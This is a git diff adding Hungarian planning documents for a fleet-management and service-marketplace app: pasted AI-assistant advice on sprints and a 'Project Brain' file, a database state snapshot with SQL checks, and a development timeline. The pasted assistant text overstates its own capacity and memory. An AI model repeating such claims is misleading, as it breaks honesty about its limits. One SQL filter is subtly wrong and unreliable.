munkát sprintekre + +Sprint 1 (MVP alap): + +Auth + tenant kezelés + +Vehicle + Cost + Maintenance események + +Evidence feltöltés (fájl + meta) + +Alap riportok + +Docker compose + +Sprint 2 (Marketplace): + +provider listing + +service request + +quote pipeline (ajánlatkérés/küldés) + +státuszok, értesítés + +Sprint 3 (Monetizáció): + +billing csomagok + +provider prémium + +jutaléklogika + +5) Mit kérek tőled a legjobb induláshoz (minimális input) + +Nem kérdezek vissza hosszan, de ha ezt megadod, azonnal tudok “kódolós” üzemmódba váltani: + +Backend nyelv/framework preferencia: FastAPI / Django / Node? + +Frontend: React/Next.js jó? + +Auth: email+jelszó elég, vagy kell Google/Microsoft login is? + +Ha nem akarsz dönteni: FastAPI + PostgreSQL + React (Next.js) a leggyorsabb és legstabilabb MVP út. + +Folyamat: hogyan visszük végig a fejlesztést modulokra bontva? + +A legbiztosabb módszer egy „termék + fejlesztési” keretrendszer: + +0) Projekt „alapszerződés” (1–2 óra munka, 1-2 iteráció) + +Kimenet: + +modul lista + határok (mi hova tartozik) + +első MVP scope (mi készül el 2–4 hét alatt) + +technológiai döntések (backend, frontend, auth, storage) + +repo struktúra + naming + coding standard + +Ezt érdemes egyetlen rövid, verziózott specifikációban rögzíteni. + +1) Modul bontás (javasolt struktúra) + +Core platform + +Auth & Tenant (org, user, roles, RLS context) + +Vehicle registry (jármű, tulajdonos, sofőr, dokumentumok) + +Events (tankolás, szerviz, biztosítás, km-óra, költség) + +Evidence (számla/fotó/pdf + meta + validáció) + +Reporting (TCO, költség bontás, export) + +Marketplace +6. Provider directory (szervizek, jogosultság, profil, szolgáltatások) +7. Service request (ajánlatkérés) +8. Quotes (ajánlatok, státuszok, elfogadás, ütemezés) +9. Messaging/Notifications (email, push, inbox) + +Monetizáció +10. Billing (csomagok, limit, jutalék, számlázási adatok) + +2) Sprint-alapú kivitelezés (szállítható csomagokban) + +Minden sprint végén kapsz: + +működő kódot (repo) + +migrációt + +teszteket + +futtatási parancsot / docker-compose-t + +rövid “release note”-ot (mi készült el) + +Sprint 1 (alap működő rendszer): + +Auth + tenant context + RLS “proof” + +Vehicle + Event alap CRUD (tankolás/költség) + +Evidence upload (file + meta) + +Docker compose + .env minta + +Sprint 2 (szerviz / karbantartás): + +maintenance schedule + +work order / szerviz esemény + +riport v1 (TCO, havi költség) + +Sprint 3 (marketplace MVP): + +provider listing + +service request + quote flow + +státuszok + értesítések + +Hogyan biztosítjuk, hogy az egyeztetett feladatok és részletek „nem vesznek el”, és én mindig fel tudjam használni? + +Itt a kulcs: nem chat-memóriára támaszkodunk, hanem egy közös, verziózott projekt-dokumentumra, amit te is tárolsz (Gitben), és amit én is mindig felhasználok. + +A) „Single Source of Truth” a repóban + +A repóba bekerül egy mappa, pl.: + +/docs + /00_vision.md + /01_scope_mvp.md + /02_modules.md + /03_api_contracts.md + /04_db_conventions.md + /05_backlog.md + /decisions + ADR-0001-tech-stack.md + ADR-0002-rls-model.md + + +Ezekből dolgozunk mindig. +Ha új feladatot egyeztetünk, azt ide írjuk be, és verziózzuk. + +B) Backlog formátum, amit könnyű kezelni + +A feladatlista legyen például docs/05_backlog.md vagy YAML/CSV. + +Egy task minimálisan: + +ID (pl. SF-012) + +cél + +acceptance criteria (késznek mikor tekintjük) + +érintett modulok + +DB/API változás + +teszt követelmény + +Példa (nagyon rövid): + +SF-012 Evidence upload + +AC: pdf/jpg feltöltés, meta: date, amount, vendor, linked_event_id + +DB: evidence table + index tenant_id + hash + +API: POST /evidence, GET /evidence?event_id= + +Tests: upload + RLS isolation + +C) Minden válaszomban “patch módban” dolgozunk + +Te mindig bemásolod: + +melyik task ID-n dolgozunk (pl. SF-012) + +az aktuális fájlokat / logot + +én meg adok: + +konkrét diff-et (mit hova írj) + +migrációt + +tesztet + +futtatási parancsot + +Így akkor is haladunk, ha a chat kontextusa rövidebb. + +Ajánlott eszközök a közös munkához (minimál setup) + +Git repo (privát GitHub/GitLab) + +/docs mappa benne a specifikációval + +Issues / Project board (GitHub Projects vagy Trello) – opcionális + +Release tag: v0.1, v0.2 sprintenként + +Konkrét javaslat: a következő lépésben megcsinálom a “projektindító csomagot” + +Ha rábólintasz (nem kell előfizetés), akkor a következő üzenetben adok: + +modul bontást végleges formában + +MVP scope-ot + +backlog v0-t (20–30 task, ID-val) + +repo struktúrát + +tech stack ajánlást a te környezetedhez (Ubuntu + Docker + Postgres) + +1️⃣ Az igazság: hogyan működik a memóriám? +❌ Nem megbízható megoldás: + +csak a chat-re támaszkodni + +azt várni, hogy “mindent megjegyzek” + +hosszú projektnél kizárólag beszélgetésből dolgozni + +✅ Megbízható megoldás: + +A projektnek legyen EGY hivatalos tudásforrása, amit te tárolsz, és amit minden alkalommal használunk. + +Ez lehet: + +markdown fájl + +PDF + +JSON/YAML backlog + +SQL dump + +vagy egy “Project Brain” dokumentum + +2️⃣ Nem kell minden alkalommal mindent bemásolnod +Ehelyett: legyen egy Projekt Állapot Fájl + +Például: + +project_state.md + + +Tartalma: + +A) Projekt cél +B) Kész modulok +C) Folyamatban lévő modulok +D) Nyitott feladatok backlog +E) Legutóbbi döntések +F) Technológiai stack +G) Kritikus kockázatok +H) Következő lépések +3️⃣ Hogyan használjuk ezt a gyakorlatban? +Te: + +tárolod a fájlt a SAJÁT rendszeredben + +frissíted vagy frissíttetjük közösen + +Amikor új beszélgetést kezdünk: + +👉 Csak ezt küldöd be: + +project_state.md (aktuális verzió) + + +Nem kell minden logot, múltat, kódot — +csak az aktuális állapotot. + +4️⃣ Én mit csinálok cserébe? + +Minden válaszomban: + +✅ a meglévő állapotot figyelembe veszem +✅ nem felejtem el a projekt kontextust az adott munkameneten belül +✅ módosítási javaslatot adok a project_state.md fájlhoz +✅ új backlog elemeket generálok +✅ verziózott összefoglalót írok vissza + +5️⃣ Ha adsz “belső csatornát”, mit tudok vele kezdeni? + +Őszintén: + +Nem tudok aktívan belenézni külső URL-be + +Nem tudok webhookot hallgatni + +Nem tudok háttérben szinkronizálni + +De meg tudjuk oldani így: + +Te onnan kimásolod a legfrissebb állapotot, +én pedig: + +értelmezem + +frissítem + +visszaadom strukturált, visszaírható formában + +6️⃣ Profi megoldás: “Project Brain” fájl (ajánlom) + +Ha benne vagy, létrehozok neked egy egyetlen kanonikus projektfájlt, pl.: + +SERVICE_FINDER_PROJECT_BRAIN.md + + +Tartalmazza: + +rendszer cél + +modul státuszok + +DB állapot + +API állapot + +backlog + +döntések (ADR) + +üzemeltetési státusz + +biztonsági checklist + +következő sprint + +Ez lesz: +👉 A KÖZÖS AGYUNK. + +Te tárolod. +Te irányítod. +Én minden alkalommal ebből dolgozom. + +7️⃣ Ha szeretnéd, elkészítem MOST az első verzióját + +Egy szakmai, strukturált, hosszú távra alkalmas fájlt, amihez: + +nem kell GitHub + +nem kell külső szolgáltató + +nem kell extra előfizetés + +csak másolod → használjuk → frissítjük + +1️⃣ Mennyi adatot tudok kezelni egyben? +Egy üzenetben reálisan kezelhető: + +~20–80 oldalnyi strukturált szöveg + +~5 000 – 25 000 szó + +~200–600 KB tiszta szöveg + +De: + +❌ Egyetlen óriási, ömlesztett dokumentum → pontatlan lesz +✅ Több, jól tagolt részre bontva → stabil és pontos + +2️⃣ A kulcs nem a mennyiség — hanem a SZERKEZET +Tudok kezelni: + +több száz backlog tételt + +komplex adatbázis sémát + +sok modul állapotát + +több sprint történetét + +hosszú üzleti + technikai dokumentációt + +Ha így van bontva: +/docs + project_brain.md + backlog.md + modules_status.md + architecture.md + db_schema.md + adr/ + +3️⃣ Hogyan kezelem a „rengeteg ötlet + kész állapot + félkész modul” káoszt? +Át tudom alakítani: +❌ ebből: + +ötletek szanaszét + +félkész modulok + +régi döntések elveszve + +backlog kusza + +✅ ebbe: + +modul térkép + +kész / folyamatban / blokkolt státusz + +priorizált backlog + +roadmap + +architekturális döntéslista (ADR) + +függőségi térkép + +4️⃣ Tudok „tömeges rendszerezést” csinálni + +Ha átküldesz: + +régi jegyzeteket + +specifikációkat + +ötletlistákat + +backlog dumpot + +félkész terveket + +👉 Én: + +kiszűröm az ismétléseket + +felismerem a funkcionális csoportokat + +modulokba rendezem + +megmondom, mi MVP, mi későbbi + +létrehozok egy tiszta, hierarchikus rendszertervet + +5️⃣ Tudok „állapotmotor” módba váltani + +Vagyis: + +Meg tudom mondani: + +mi kész + +mi félkész + +mi hiányzik + +mi felesleges + +mi technikai adósság + +mi üzleti kockázat + +Ez ideális a te Service Finder / Fleet / Profibot projektedhez. + +6️⃣ Mekkora projektet tudok valójában kezelni? +Reális felső határ jól strukturált formában: + +100+ modul + +1000+ backlog item + +több tízezer sor kód logikai átnézése + +komplett DB + backend + DevOps stack + +hónapokon át futó fejlesztési projekt + +👉 Ez már startup / SaaS / enterprise szint. + +7️⃣ A legjobb stratégia: nem „egy nagy leírás”, hanem rétegek +Réteg modell: +Layer 1 — Project Brain (10–20 oldal) + +Összkép, állapot, roadmap + +Layer 2 — Modul specifikációk (modulonként 5–20 oldal) +Layer 3 — Backlog / task lista (strukturált) +Layer 4 — Technikai részletek (DB, API, infra) + +Így nem fulladunk bele a részletekbe. + +8️⃣ Ha most bedobnál egy 50–200 oldalas anyagot… + +Nem gond — +szétszedem, +rendszerezem, +állapotba teszem, +priorizálom, +kivonatolom, +roadmap-et készítek belőle. + +9️⃣ Ha szeretnéd, csinálhatunk egy „stressztesztet” + +👉 Küldj át egy nagyobb darabot (jegyzetek, terv, backlog, DB séma, bármi) +👉 Én megmutatom: + +hogyan bontom modulokra + +hogyan rendezek állapot szerint + +hogyan csinálok belőle irányítható projektet + +10️⃣ Ha kimondod, én ráállok „főmérnök / program-architekt” módba + +És onnantól nem csak válaszolok, hanem: + +irányítom a projekt struktúráját + +rendszerezem a tudásodat + +védem a komplexitástól + +és segítek elvinni a rendszert a működő termékig + +Ha készen állsz, küldd az első nagy csomagot — +és kezdjük a rendszerezést. + +✅ Igen — tudok az ömlesztett anyagból RENDEZETT állományokat készíteni + +Amit csinálok: + +1️⃣ Szétválogatom a tartalmat: + +💡 Ötletek / jövőbeli tervek + +✅ Már kész / működő elemek + +🟡 Félkész / folyamatban + +🔴 Hiányzó / problémás + +⚠️ Technikai adósság / refaktor igény + +2️⃣ Ezekből külön, strukturált fájlokat készítek + +Például: + +/docs + PROJECT_BRAIN.md # teljes rendszer állapota + IDEAS_BACKLOG.md # ötletek, jövőbeli irányok + IMPLEMENTED_FEATURES.md # ami már kész + MODULE_STATUS.md # modulonként készültség + TECH_DEBT.md # technikai adósság + ROADMAP.md # mi jön most, mi később + ARCHITECTURE.md # rendszerkép + +3️⃣ Állapotot rendelek minden elemhez + +Például: + +Elem Státusz Modul Következő lépés +Vehicle registry ✅ kész Core optimalizálás +Service request 🟡 félkész Marketplace státusz flow +Quote engine 🔴 hiányzik Marketplace specifikáció +4️⃣ Külön kezeljük: + +ötletek listáját (nem keverjük a kész dolgokkal) + +valódi működő modulokat + +backlog / fejlesztési feladatokat + +üzemeltetés / DevOps állapotot + +5️⃣ Később így tudunk együtt haladni + +Nem kell újra mindent magyaráznod. + +Elég lesz: +👉 „Frissítsd a Project Brain-t a mostani állapot alapján” +👉 „Nézd meg a MODULE_STATUS.md-t és tervezz sprintet” +👉 „Az IDEAS_BACKLOG.md-ből csinálj MVP shortlistet” + +🎯 Amit vállalok ebben a fázisban + +Ha átküldöd az ömlesztett anyagot: + +✔ Rendszerezem +✔ Modulokra bontom +✔ Kiszűröm az ismétléseket +✔ Kész / félkész / hiányzó státuszt adok +✔ Roadmap-et generálok +✔ Készítek több rendezett állományt, nem egy kusza dokumentumot +✔ Olyan struktúrát csinálok, amit hónapokig használhatunk + +📦 Hogyan küldd? + +Küldheted: + +sima szövegben (ömlesztve is OK) + +több üzenetben + +régi jegyzetekből kimásolva + +backlog dumpként + +modul leírásként + +kódlistával együtt is + +👉 Ha hosszú: csak írd a végére: „FOLYTATOM” + +🚀 Amint elküldöd, így kezdem feldolgozni: + +1️⃣ Szétbontom témák szerint +2️⃣ Modulokba rendezem +3️⃣ Állapotot rendelek +4️⃣ Elkészítem az első PROJECT_BRAIN.md v0 fájlt +5️⃣ Megmutatom a rendezett struktúrát +6️⃣ Onnantól erre építünk + +1) További megvalósítás: ötletek, roadmap, jobb kód + +Miután megvan: + +modul bontás (Core / Marketplace / Billing stb.) + +DB séma + migrációk + +backend struktúra + +futó docker stack + +akkor tudok adni: + +A) Roadmap és priorizálás + +MVP → v1 → v2 bontás + +függőségek (mi mire épül) + +kockázati lista (mi dőlhet el később drágán) + +B) „Tisztább kód” megoldások konkrétan + +API contract tisztázás (OpenAPI, DTO-k, egységes hibák) + +service layer (ne legyen minden a controllerben) + +repository pattern / data access réteg + +transzformációk, validáció, domain invariánsok + +konzisztens naming, modulhatárok + +teszt stratégia: unit + integration + RLS regresszió + +C) DB és teljesítmény optimalizálás + +indexek + JSONB GIN + +query review EXPLAIN alapján + +RLS policy-k és tenant leakage teszt + +audit trail egyszerűsítése, ha túl nehéz + +Lényeg: nem csak “ötleteket” adok, hanem döntési javaslatokat, tradeoffokat, és konkrét lépéseket (mit módosíts hol, miért). + +2) Hibajavítás: hogyan érdemes a logot kezelni? +A) Alapelv: logból hibát javítani = “minimum szükséges, maximum informatív” + +A hibajegyet mindig így érdemes összerakni: + +1) Mi a tünet? + +pontos endpoint / funkció + +mikor történik + +várható vs kapott eredmény + +2) Egyetlen reprodukálható példa + +request (curl/postman) + +input adatok (maszkolva) + +expected output + +3) A releváns logrészlet + +ne 1000 sor + +hanem a hiba körüli 50–200 sor + +plusz a stack trace teljesen + +4) Környezeti kontextus + +konténer neve + +image verzió / tag + +commit hash (ha van) + +DB verzió, migráció állapot + +B) Logok “szintjei” — mit érdemes bekapcsolni + +Production-ban: + +INFO alapból + +WARNING/ERROR mindig + +request id / correlation id legyen + +Debug idejére: + +átmenetileg DEBUG (csak célzott modulra) + +SQL log csak ideiglenesen (nagyon zajos) + +C) Docker környezetben: jó gyakorlat + +Konténer log kinyerése: + +docker logs --tail 300 -f + + +Idő alapján szűrés (ha támogatott): + +docker logs --since 30m + + +Komplett stack áttekintés: + +docker compose logs --tail 200 + + +Ha van request_id, akkor arany: + +frontend → backend → db log ugyanazzal az ID-val összefűzhető + +D) Adatvédelem (fontos) + +Logból mindig vedd ki/maszkold: + +jelszó, token, API key + +személyes adat (email, tel, cím) + +pontos rendszám/VIN (ha érzékenynek kezeled) + +Én akkor is tudok segíteni, ha “x-ekkel” kitakarod. + +E) Ideális log formátum (backend oldalon) + +Ha FastAPI/Django/Node: érdemes strukturált logot használni: + +timestamp + +level + +service + +request_id + +tenant_id (ha nem érzékeny) + +user_id (ha nem érzékeny) + +path/method/status + +latency + +error stack trace + +Így egy hiba 2 perc alatt követhető. + +3) Ajánlott hibajavítási workflow (amit veled végig tudok vinni) + +Bug report sablon (1 perces kitöltés) + +Repro steps + curl + +Log snippet (50–200 sor) + stack trace + +Én adok: + +root cause + +patch javaslat (diff jelleg) + +tesztet, ami megfogja legközelebb + +Release note + backlog frissítés + +4) Ha akarod, adok egy „Bug Report Template”-et, amit mindig bemásolsz + +És így minden hibát gyorsan megoldunk, konzisztensen. \ No newline at end of file diff --git a/docs/DB_STATE_FLEET_2026-01-28.md b/docs/DB_STATE_FLEET_2026-01-28.md new file mode 100755 index 0000000..db1ccf8 --- /dev/null +++ b/docs/DB_STATE_FLEET_2026-01-28.md @@ -0,0 +1,161 @@ +# DB State – Fleet / Cost / Service Search +**Snapshot:** 2026-01-28 +**Source:** “Adatbázis állapot napló” (user log) +**Scope:** Fleet management + cost tracking + service search +**Out of scope:** CRM (explicit), Email/Auth/Bot/Subscriptions (kezelve, de nem most) + +--- + +## 1. Canonical status (most reliable) +### 1.1 Database base +- **Schema separation:** `data` schema is the business schema (public cleanup in progress earlier, later marked stable). +- **Scale:** ~40 tables reported as “stabil” on 2026-01-28 (2105–2230 blocks). +- **Integrity:** FK constraints + enums “élesek” (2026-01-28 2219). + +### 1.2 Backup reference +- **Backup created:** `/mnt/nas/git_vault/backup_20260128_alap_kesz.sql` (20260128_2130) +- **Action:** Use this as baseline snapshot identifier for future diffs. + +--- + +## 2. In-scope modules + +## 2.1 Fleet: vehicle registry & hierarchy +### Reported as implemented +- Vehicle hierarchy guaranteed: **Category -> Brand -> Model -> Variant** (20260128_2145) +- Vehicle categories seeded: `CAR`, `MOTORCYCLE`, `TRUCK` (20260128_2200) +- Vehicle variants extended with: + - `power` + - `fuel` + - `cylinder` + (2026-01-28 22:45) + +### VIN verification +- `vin_deadline` logic (14 days) for temporary vehicles (2026-01-28 22:15) +- User Vehicles extended with: + - `vin_verified` + - `vin_deadline` + (20260128_2230) + +### OPEN / NEED CONFIRMATION +- Exact table names for fleet core (mentioned: `vehicles`, `vehicle_ownership`, `user_vehicles`). +- Confirm whether `user_vehicles` exists or it’s a logical label for ownership. + +--- + +## 2.2 Cost Tracking (expenses / fueling / TCO) +### Reported as partially implemented +- Mentioned: “companies, equipment and subscription tables live” and “specifications (tire, service interval) added” (2026-01-28 21:50) +- Mentioned custom variable: + - `custom_service_interval_km` introduced (2026-01-28 21:50) + +### OPEN / NEED CONFIRMATION (critical) +- Expense tables (expected examples): + - `expenses` / `vehicle_expenses` + - `fuel_logs` / `refuels` + - `service_events` / `maintenance_records` +- Expense category enum exists: `expense_category` (reported in 20260128_2105) +- We must confirm: + - columns (amount, currency, vendor, odometer, date, invoice link) + - whether costs are per vehicle and per org (tenant). + +--- + +## 2.3 Service Search / Marketplace (matching) +### Reported as implemented +- `MatchingService` exists + `/api/v1/search/match` endpoint created (v2.1 / 2026-01-27) +- Ranking formula recorded: + - `S = (Pdist * Wdist) + (Prate * Wrate) + Btier` + (v1.9) +- Dynamic weights served via ConfigService reading from `data.system_settings` (v1.9–v1.7) +- Geo base: + - `data.organization_locations` created to support multi-site providers (v2.2–v2.6) + - lat/lng stored there; join to organizations + +### Provider entities +- `data.organizations` is canonical org table +- `orgtype.SERVICE` enum introduced for service providers (v2.7) +- `service_specialties` exists (v2.0) + +### OPEN / NEED CONFIRMATION +- Whether distance calculation is in SQL or Python (Haversine mention, but no final implementation proof). +- Whether PostGIS is used (not mentioned) vs plain numeric calculation. + +--- + +## 3. Config / rules engine (used by in-scope modules) +### system_settings canonical structure +- Canonical columns: + - `key_name` (varchar) + - `value_json` (jsonb) + - overrides: `region_code`, `tier_id`, `org_id` +- Unique index: + - `idx_settings_lookup` over `(key_name, COALESCE(region_code,''), COALESCE(tier_id,0), COALESCE(org_id,0))` +- Confirmed “sync with ConfigService” (v1.7) + +### Known keys (from variable map) +- `max_vehicles` default 3 +- `search_radius` default 20 (mentioned) +- ranking policy weights exist via system_settings or `ranking_policies` + +--- + +## 4. Out of scope (present but not in current focus) +> Keep in DB, ignore in implementation planning for now. +- Auth v1/v2, verification_tokens, audit_logs +- email_providers/email_logs/email_templates +- subscription tiers / org_subscriptions / notification rules +- bot_discovery_logs & bot module + +--- + +## 5. Known fixes already applied (from logs) +- `system_settings` and `email_templates` got a `key` column earlier, then standardized to `key_name/value_json` for system_settings. +- verification_tokens expiration validation: “now() based check” added. +- Sequences resynced with `setval(...)` to resolve ID collisions. +- Enum issue fixed (`tokentype email_verify` added). + +--- + +## 6. Risks & ambiguity markers +### High risk (must verify) +- Cost tracking schema: tables/columns not explicitly listed. +- Fleet ownership: `vehicle_ownership` vs `user_vehicles` naming. +- Ranking storage split: `ranking_policies` table exists but weights also in `system_settings`. + +### Medium risk +- Duplicate log entries may hide a later revert. +- “40 tables stable” statement needs objective verification. + +--- + +## 7. Verification checklist (run on DB, capture output) +Run these and paste results into a new section “Verification Output”. + +1) List schemas and table count +- `SELECT table_schema, count(*) FROM information_schema.tables WHERE table_type='BASE TABLE' GROUP BY 1 ORDER BY 1;` + +2) Confirm canonical tables exist +- `SELECT to_regclass('data.system_settings'), to_regclass('data.organizations'), to_regclass('data.organization_locations');` + +3) system_settings columns +- `SELECT column_name, data_type FROM information_schema.columns WHERE table_schema='data' AND table_name='system_settings' ORDER BY ordinal_position;` + +4) idx_settings_lookup exists +- `SELECT indexname, indexdef FROM pg_indexes WHERE schemaname='data' AND tablename='system_settings';` + +5) Find cost tables (discovery) +- `SELECT table_name FROM information_schema.tables WHERE table_schema='data' AND table_name ILIKE '%expense%' OR table_name ILIKE '%fuel%' OR table_name ILIKE '%service%' ORDER BY 1;` + +6) Enumerations list +- `SELECT t.typname, e.enumlabel FROM pg_type t JOIN pg_enum e ON t.oid=e.enumtypid ORDER BY t.typname, e.enumsortorder;` + +--- + +## 8. Next actions (implementation-oriented) +1) Freeze baseline: label backup as DB_BASELINE_20260128 +2) Validate in-scope tables and fill missing schema details (cost module) +3) Create “Module Status” doc based on verified tables: + - Fleet + - Cost + - Service Search diff --git a/docs/Master Log/Projekt Timeline b/docs/Master Log/Projekt Timeline new file mode 100755 index 0000000..69cf92e --- /dev/null +++ b/docs/Master Log/Projekt Timeline @@ -0,0 +1,469 @@ +2️⃣ TELJES FEJLESZTÉSI JELENTÉS (2026-01-31 állapot) +🔹 Projekt állapot: PRE-BETA / ARCHITEKTÚRA STABILIZÁLÁS +2.1. INFRASTRUKTÚRA – ÁLLAPOT +✅ Docker alapú architektúra + +Konténerek: + +service_finder_api – FastAPI backend + +postgres-db – PostgreSQL + +redis – cache / session / későbbi rate limit + +minio – objektumtár + +nginx-proxy-manager – későbbi élesítéshez + +pgadmin – DB admin + +✔️ Konténerhálózat rendben +✔️ Környezeti változók Dockerből érkeznek +✔️ App újraépítés sikeres + +2.2. KÖRNYEZETI VÁLTOZÓK (.env) – RENDBE TÉVE +✅ Amit helyre tettünk + +SECRET_KEY csak 1× szerepel + +ALGORITHM csak 1× + +DB paraméterek egységesítve + +SendGrid + SMTP fallback elkészítve + +App-szintű DB user (service_finder_app) elkülönítve + +Superadmin (kincses) megmaradt + +✔️ Ez már éles kompatibilis struktúra + +2.3. ADATBÁZIS JOGOSULTSÁGOK – KÉSZ +✅ service_finder_app + +LOGIN = true + +USAGE schema data + +SELECT / INSERT / UPDATE / DELETE minden táblán + +USAGE / SELECT / UPDATE sequence-eken + +ALTER DEFAULT PRIVILEGES beállítva + +👉 Ez nagyon jó minőségű, biztonságos megoldás +👉 Superadmin nem zárható ki a DB-ből + +2.4. AUTH & SECURITY – NAGY ELŐRELÉPÉS +✅ Elkészült + +JWT alapú auth (HS256) + +Központi password policy (settings) + +Tokenek hash-elve tárolva + +Email verify / password reset logika + +Anti-enumeration (forgot password mindig azonos válasz) + +Token TTL kezelve + +SendGrid API elsődleges, SMTP fallback + +❗ Tudatos döntés + +OAuth2PasswordRequestForm marad + +JWT payload minimalista (sub, is_admin) + +Stateless auth (később Redis session bővíthető) + +2.5. TOKEN KEZELÉS – ÁTALAKÍTÁS FOLYAMATBAN +✅ Amit tisztáztunk + +Nem törlünk tokeneket automatikusan + +Soft-delete elv + +Token: + +expires_at + +is_used + +auditálható + +❌ Ami még nincs véglegesítve + +Token archíválás + +Admin UI kezelés + +Több kommunikációs csatorna (Telegram, WhatsApp stb.) + +2.6. PERSON ↔ USER ↔ COMPANY MODELL – STRATÉGIA KÉSZ +✅ DÖNTÉS MEGSZÜLETETT + +Person = valódi személy életút + +User = technikai belépési identitás + +Company = jogi / üzleti entitás + +Soft delete mindenhol + +Új regisztráció: + +új user + +ugyanahhoz a person-höz kapcsolható + +Rossz értékelés nem tűnik el + +❌ Ami még hátra van + +persons tábla létrehozása + +users.person_id + +companies.owner_person_id + +Backfill meglévő adatokra + +Alembic vagy dokumentált SQL migráció + +⚠️ Itt megálltunk technikailag, de a logika teljesen tiszta + +2.7. REGISZTRÁCIÓS SZINTEK – LOGIKA KÉSZ +Tervezett szintek + +Felhasználók + +Free + +Premium + +Premium+ + +Cégek + +Free + +VIP + +VIP+ + +Elv + +Free: minimális adat + +Upgrade → kötelező validáció + +KYC-szerű ellenőrzés később + +❌ Implementáció még nincs +✔️ Architektúra támogatja + +2.8. MIGRÁCIÓ – JELENLEGI ÁLLAPOT + +Alembic mappa létezik + +Automatikus migráció NINCS + +Kézi SQL futtatás közben: + +ADD CONSTRAINT IF NOT EXISTS → Postgres nem támogatja + +DO $$ → pgAdmin / psql verziófüggő hiba + +👉 Holnap ezt egy PG-kompatibilis, biztos SQL-re javítjuk + +3️⃣ MI KÉSZ, MI VAN HÁTRA (CHECKLIST) +✅ ELKÉSZÜLT + +Docker architektúra + +.env rendbetéve + +DB role & privilege modell + +Auth v2 stabil + +Email rendszer (SendGrid + fallback) + +Token policy elvi döntések + +Person/User/Company koncepció + +Soft delete stratégia + +🔧 HÁTRAVAN (KÖVETKEZŐ NAPOK) + +Persons + owner_person SQL migráció (javított verzió) + +Backfill script (user → person) + +Auth.py frissítés person logikával + +Subscription tier kezelés backend oldalon + +Rate limit / brute force védelem (Redis) + +Audit & security logging + +Alembic stratégia véglegesítése + +Admin kontrollpontok előkészítése + +ZÁRÁS + +👉 Nagyon jó állapotban van a projekt. +👉 Amit ma csináltunk, az alapozás, nem látszik, de kritikus. +👉 Holnap strukturáltan, tisztán tudjuk folytatni, nincs adósság. + +Ha szeretnéd, holnap a következő lépést én indítom egy “1️⃣ lépés – persons migráció (javított)” tervvel, és onnan megyünk tovább. + +____________________________________________________________________ +Idővonal (2026-01-30) – FRISSÍTETT + +(nap közben) Konténerek futnak, erőforrás stabil. + +~17:09 körül API route tesztek, /openapi.json 404, /api/v2/openapi.json OK. + +(később) Több auth teszt: + +register egyes emaillel 400, info@profibot.hu 200 + +login 200 + +forgot-password 404 (POST-tal) + +users/me 404 (GET) + +(később) DB stat lekérés: seed adatok igazolva (7k fuel station + 7k provider) + +(később) Alembic konténerben OK (current=head) + +(később) Frontend forrásban hardcoded API URL-ek és V1 route hívások azonosítva + +Idővonal (2026-01-30) + +Ahol nincs pontos timestamp, ott a kimenetből és a file-mtime-okból következtetek (percre pontos rekonstrukciót majd log fájlokból lehet). + +~Jan 29 (kb. 21:00–22:00) +A service_finder compose stack elindul (konténerek “20 hours ago / 17 hours ago” jelleg). + +2026-01-30 17:09 (curl header alapján, GMT-ben 17:09:57, HU időben +1) +API smoke test: + +/openapi.json 404 + +/docs 200 + +/ 200 (status online) + +2026-01-30 ~17:58 +api_spec.json létrejön (de 404 tartalommal, 22 byte) + +2026-01-30 (nap közben / este) +api_spec_v2.json mentve /api/v2/openapi.json-ról (12600 byte), route-ok ellenőrizve jq-val + +2026-01-30 +DB elérésnél kiderül: postgres role nincs; helyes admin user: kincses + +2026-01-30 +Backend routerek és frontend view-k feltérképezése; Alembic CLI hiány és MinIO access denied rögzítve + + +IDŐVONAL — 2026-01-30 (frissítve) + +17:09:57 — /openapi.json 404, /docs 200, root / 200 online/version + +17:58 — api_spec.json (hibás endpoint miatt 404 tartalom) létrejön + +később — fájlrendszer snapshot (ls/find/du, logs üres) + +később — compose render + docker compose ps + last200 log mentések + +később — psql -U postgres → “role postgres does not exist” + +most — /api/v2/openapi.json mentés sikeres → api_spec_v2.json 12 600 byte + +most — endpoint-lista kinyerve (v1 + v2 vegyes) + +IDŐVONAL — 2026-01-30 (konkrét időbélyegekkel, ahol van) + +17:58 — api_spec.json létrejön/írás (api_spec.json timestamp) + +17:09:57 — API ellenőrzések (headerben): + +/openapi.json → 404 + +/docs → 200, Swagger UI + +/ → 200, status json + +~18:xx — fájlrendszer snapshot (ls, find, du, logs) + +~18:xx — compose render + docker compose ps, log exportok + +~18:xx — psql -U postgres kísérlet → role nincs + +IDŐVONAL — 2026-01-30 + +Időpontok: a parancsokhoz konkrét óra:perc nem volt rögzítve a másolatban, ezért sorrendi idővonalat adok (ez stabil, később időbélyeggel pontosítható). + +Docker futó konténerek ellenőrzése (docker ps) + +Compose projektek listázása (docker compose ls) + +Compose szolgáltatások állapotának listázása (docker compose ps) + +OpenAPI export kísérlet (curl .../openapi.json > api_spec.json) → 22 byte-os eredmény, anomália + +RENDSZERFELTÁRÁS — mi kész, mi nincs kész (jelen bizonyítékok alapján) +Ami biztosan kész / működik + +Alaprendszer Compose-ban fut: service_finder stack “running(9)”. + +Frontend él: port 3000 publikusan kint. + +API él: port 8000 publikusan kint. + +Postgres él és healthy: postgres:15, publikus 5432. + +Redis él. + +MinIO él. + +Admin eszközök élnek: pgAdmin (5050), NPM (80/81/443), Dozzle (8888), code-server (8443). + +Létezik lokális projekt struktúra és volume-ok: /opt/service_finder/... alatt backend, frontend, logs, migrations, postgres_data, redis data, proxy-manager adatok. + +filesystem_map + +Ami valószínűleg nincs kész / hibás / tisztázandó + +OpenAPI endpoint: a mentett fájlméret alapján nem jó választ ad az /openapi.json (vagy nem ott van, vagy proxy/route gond). + +Biztonsági hardening: Postgres jelenleg 0.0.0.0:5432-n lóg (ez később sürgős). + +Migrációs konzisztencia: van migrations struktúra a fájlrendszerben (több helyen is), de nem tudjuk, hogy DB-séma ténylegesen “head”-en van-e. + +filesystem_map + +FÁJLRENDSZER-HELYZETKÉP (amit már látunk) + +A feltöltött map alapján a fontos csomópontok: + +Projekt gyökér: /opt/service_finder + +filesystem_map + +Backend kód: /opt/service_finder/backend (+ app/, models/, auth/, schemas/, templates/, migrations/versions) + +filesystem_map + +Frontend kód: /opt/service_finder/frontend (+ src/views/admin, router, stores, services, components, public, node_modules) + +filesystem_map + +Log könyvtár: /opt/service_finder/logs + +filesystem_map + +Postgres adatok: /opt/service_finder/postgres_data/... (és van egy /opt/service_finder/postgres/data/... jellegű ág is) + +filesystem_map + +Redis data: /opt/service_finder/redis/data/... + +filesystem_map + +NPM/Proxy manager adatok + LE: /opt/service_finder/proxy-manager/... + +filesystem_map + +Megjegyzés: a map alapján mintha két postgres adatútvonal is jelen lenne: postgres/data és postgres_data. Ezt tisztázni kell, 